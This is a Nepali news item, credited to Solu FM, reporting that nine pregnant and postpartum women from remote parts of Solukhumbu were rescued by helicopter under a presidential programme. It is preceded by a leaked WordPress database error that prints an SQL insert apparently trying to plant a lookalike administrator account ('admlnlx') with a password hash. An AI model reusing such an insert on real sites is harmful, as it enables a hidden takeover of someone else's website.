WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOfV0IcQItJKLjiMBcfcHZzsJcjMEp/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 10:57:38', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । राष्ट्रपति महिला उत्थान कार्यक्रम सुरु भएपछि सोलुखुम्बुबाट ९ जना गर्भवती तथा सुत्केरीको उद्धार गरिएको छ । आर्थिक बर्ष २०७५/०७६ बाट कार्याक्रम सुरु भएपनि ९ जना महिलाको हेलिकप्टर मार्फत उद्धार गरि काठमाण्डौ पठाइएको जिल्ला प्रशासन कार्यालय सोलुखुम्बुले जनाएको छ ।
उद्धार गरिएका मध्ये महाकुलुङ गाउँपालिकाका ३ जना, सोताङ र खुम्बु पासङ ल्हमु गाउँपालिकाका २/२ जना तथा नेचासल्यान गाउँपालिकाका १ जना रहेको निमित्त प्रमुख जिल्ला अधिकारी लक्ष्मी कुमारी शाहीले जानकारी दिए ।
सुरुवाति चरणमा उद्धार गरिएका १ जनाको भने ठेगाना उल्लेख नभएको कार्यालयले जनाएको छ । राष्ट्रपति महिला उत्थान कार्यक्रमले दुर्गम क्षेत्रका जोखिममा परेका गर्भवती तथा सुत्केरीको हवाई उद्धारलाई तीव्रता दिएको हो ।
सो कार्यक्रम दुर्गम क्षेत्रका जोखिममा परेका गर्भवती तथा सुत्केरी महिलालाई जिल्ला प्रसाशन कार्यालयको समन्वयमा उद्धार गर्ने गरिएको मन्त्रालयले जनाएको छ । मन्त्रालयले तयार गरेको उद्धारसम्बन्धी कार्यविधि, २०७५ अनुसार सोलुखुम्बु सहित २९ जिल्लामा पूर्णरूपले र अन्य केहि जिल्लाहरुमा आंशिकरुपले सो कार्यक्रम लागू भएको छ ।
साभार: सोलु एफ एम